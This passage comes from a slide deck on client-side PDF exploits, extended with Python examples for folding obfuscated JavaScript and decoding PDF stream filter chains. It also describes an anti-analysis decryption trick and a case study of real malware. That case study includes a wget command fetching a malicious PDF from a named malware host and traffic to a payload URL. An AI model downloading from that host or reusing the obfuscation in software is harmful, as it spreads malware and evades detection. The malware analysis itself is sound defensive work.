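            depth += (ch == "(") - (ch == ")")
            buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def evaluate(expr, env, log):
    """Value of an expression built from literals, names, '+' and eval calls."""
    expr = expr.strip()
    parts = split_top(expr, "+")
    if len(parts) > 1:                                 # string concatenation
        values = [evaluate(p, env, log) for p in parts]
        if not all(isinstance(v, str) for v in values):
            raise Opaque(expr)
        return "".join(values)
    if STRING_LIT.match(expr):
        return re.sub(r"\\(.)", r"\1", expr[1:-1], flags=re.S)
    if NAME.match(expr):
        if expr == "eval":
            return EVAL
        if expr in env:
            return env[expr]
        raise Opaque(expr)
    call = CALL.match(expr)
    if call and evaluate(call.group(1), env, log) is EVAL:
        code = evaluate(call.group(2), env, log)       # the argument to eval, once resolved
        if not isinstance(code, str):
            raise Opaque(expr)
        return run(code, env, log)                     # eval'd code runs in the same scope
    raise Opaque(expr)


def run(code, env, log):
    """Symbolically run a statement list; returns the value of the last statement."""
    result = None
    for stmt in split_top(code, ";"):
        try:
            assign = ASSIGN.match(stmt)
            if assign:
                env[assign.group(1)] = result = evaluate(assign.group(2), env, log)
            else:
                result = evaluate(stmt, env, log)
        except Opaque:
            log.append(stmt)              # what the engine would actually execute
            result = None
    return result


def deobfuscate(code):
    """Return the statements that survive folding, i.e. the real payload."""
    log = []
    run(code, {}, log)
    return log
```

Anything outside this tiny subset (loops, `String.fromCharCode`, `unescape`) is reported rather than guessed, which keeps the folder honest: the output is a list of statements to read, not a claim about what the script does.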
![Page 54: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/54.jpg)
Callee Trick
The function reads its own source text (arguments.callee.toString()) and uses it as the key to decrypt code or data, so any change to the function's text, such as beautifying it, changes the key and breaks the decryption.

```javascript
function decrypt(cypher) {
  var key = arguments.callee.toString();
  var plain = "";
  for (var i = 0; i < cypher.length; i++) {
    plain += String.fromCharCode(key.charCodeAt(i) ^ cypher.charCodeAt(i));
  }
  ...
}
```
![Page 55: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/55.jpg)
Pdf obfuscations
Using filters for streams. The most common encoding techniques:
ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode
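To show what undoing such a filter chain involves, here is an added example (not code from the talk) that decodes ASCIIHexDecode, ASCII85Decode, FlateDecode and RunLengthDecode in the order a stream dictionary lists them, and refuses rather than guesses for anything it does not handle (LZWDecode is left out). The streams it decodes are constructed inside the block, not extracted from a real file, and the helper names are the example's own.

```python
"""Undoing a PDF stream's /Filter chain (added example, not from the talk)."""
import base64
import re
import zlib


def ascii_hex_decode(data):
    """ASCIIHexDecode: hex digits, whitespace ignored, '>' ends the data, odd count padded with 0."""
    digits = re.sub(rb"\s", b"", data.split(b">", 1)[0])
    return bytes.fromhex((digits + b"0" * (len(digits) % 2)).decode())


def ascii85_decode(data):
    """ASCII85Decode: base-85 text terminated by '~>'."""
    return base64.a85decode(re.sub(rb"\s", b"", data.split(b"~>", 1)[0]))


def run_length_decode(data):
    """RunLengthDecode: length byte L; L < 128 copies the next L+1 bytes,
    L > 128 repeats the next byte 257-L times, L == 128 marks end of data."""
    out, i = bytearray(), 0
    while i < len(data):
        length = data[i]
        if length == 128:
            break
        if length < 128:
            out += data[i + 1:i + 2 + length]
            i += 2 + length
        else:
            out += data[i + 1:i + 2] * (257 - length)
            i += 2
    return bytes(out)


DECODERS = {
    b"ASCIIHexDecode": ascii_hex_decode,
    b"ASCII85Decode": ascii85_decode,
    b"FlateDecode": zlib.decompress,
    b"RunLengthDecode": run_length_decode,
}


def filter_chain(dictionary):
    """Filter names from '/Filter /Name' or '/Filter [/A /B]', in the order to undo them."""
    m = re.search(rb"/Filter\s*(\[[^\]]*\]|/[A-Za-z0-9]+)", dictionary)
    return re.findall(rb"/([A-Za-z0-9]+)", m.group(1)) if m else []


def decode_stream(dictionary, raw):
    """Apply each decoder in turn; an unhandled filter (e.g. LZWDecode) raises instead of guessing."""
    data = raw
    for name in filter_chain(dictionary):
        if name not in DECODERS:
            raise NotImplementedError("/%s is not handled in this example" % name.decode())
        data = DECODERS[name](data)
    return data


# Constructed samples: one script compressed and then text-armoured two ways, plus a
# hand-made RunLength stream ('abc', then 'z' three times, then the EOD marker).
SCRIPT = b'app.alert("constructed sample");'
HEX_FLATE = (b"<</Filter[/ASCIIHexDecode/FlateDecode]>>",
             zlib.compress(SCRIPT).hex().encode() + b">")
A85_FLATE = (b"<</Filter[/ASCII85Decode/FlateDecode]>>",
             base64.a85encode(zlib.compress(SCRIPT)) + b"~>")
RUN_LENGTH = (b"<</Filter/RunLengthDecode>>", b"\x02abc\xfez\x80")
```

Stacking a text filter on top of Flate is exactly the kind of chain a scanner that only greps for `app.alert` never sees; decoding with the chain in the listed order is what pdf-parser-style tools do before handing the script to the JavaScript analysis steps.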
![Page 56: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/56.jpg)
Case Study
Malware found via www.malwaredomainlist.com
File link: www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
Added on: 29th July 2010
![Page 57: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/57.jpg)
VirusTotal report: 5/42 (11.90%)
![Page 58: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/58.jpg)
Analysis
![Page 59: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/59.jpg)
STEP-1
wget www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
![Page 60: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/60.jpg)
STEP-2
Behavioral analysis
Environment:
• Using a VM image
• Filemon, Procmon, Regmon, TCPView
Results:
• The process 'AcroRd32.exe' was trying to connect to the remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
![Page 61: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/61.jpg)
STEP-3
pdfid.py
![Page 62: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/62.jpg)
STEP-4
Static/Code Analysis
![Page 63: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/63.jpg)
Word Editor
![Page 64: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/64.jpg)
Decoded the script
![Page 65: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/65.jpg)
Formatted using jsbeautifier.org
![Page 66: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/66.jpg)
Replacing with meaningful identifiers and removing unnecessary comments
![Page 67: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/67.jpg)
Replacing ‘X’ from parameter
![Page 68: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/68.jpg)
![Page 69: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/69.jpg)
Shellcode Analysis
Connecting to…http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
![Page 70: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/70.jpg)
Road Ahead
• Mitigations
• Adobe's security measures
• Future exploit methods
![Page 71: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/71.jpg)
How can we protect ourselves
• Enable automatic updates: it sounds simple, but you need to turn it on in the software settings for it to happen by default.
• Disable PDF browser integration: most browsers open PDFs without asking, so an infected PDF delivers its payload without warning, hidden in the background.
• Always install the latest patch/update, even for older Adobe product versions.
• Disable JavaScript.
• Uncheck 'Allow non-PDF file attachments with external applications' to prevent the launch action vulnerability.
• PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on; however, alternative programs become just as exposed to malware as they gain popularity.
![Page 72: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/72.jpg)
Road Ahead
• Less focus on JavaScript exploits
• Attackers focusing more on embedded objects inside PDF, i.e. Flash
• Adobe to introduce sandboxing to limit Reader exploits
![Page 73: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/73.jpg)
Tools And References
![Page 74: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/74.jpg)
Tools used
• Malzilla
• Mozilla add-on: JavaScript Deobfuscator by Wladimir Palant
• VMware Player
• Sysinternals tools: Procmon, Filemon, Regmon, TCPView
• WinHex, HexEdit
![Page 75: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/75.jpg)
References
www.malwaredomainlist.com
www.adobe.com/
www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
www.blog.didierstevens.com
www.jsbeautifier.org
http://research.globalthoughtz.com
http://www.zdnet.com/
http://www.scansafe.com/
http://www.computerworld.com/s/article/9176117/
http://www.darkreading.com/
http://www.virustotal.com/
http://recon.cx/
http://www.blog.zynamics.com
![Page 76: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/76.jpg)
References continued..
http://www.marketwire.com/
http://www.symantec.com/
http://www.securelist.com/en/analysis
http://contagiodump.blogspot.com/
http://www.f-secure.com/
http://www.securelist.com/
http://www.secureworks.com/
http://en.wikipedia.org/
http://www.malwaredomainlist.com/
http://blogs.adobe.com/
http://blog.fireeye.com/
http://intrepidusgroup.com/
http://www.vupen.com
![Page 77: Client Side Exploits using PDF](https://reader030.fdocuments.net/reader030/viewer/2022012902/546c1f82af795980298b4ec1/html5/thumbnails/77.jpg)
Thank you
Tamaghna Basu: [email protected], titanlambda, tamahawk-techguru.blogspot.com
Ankur Bhargava: [email protected]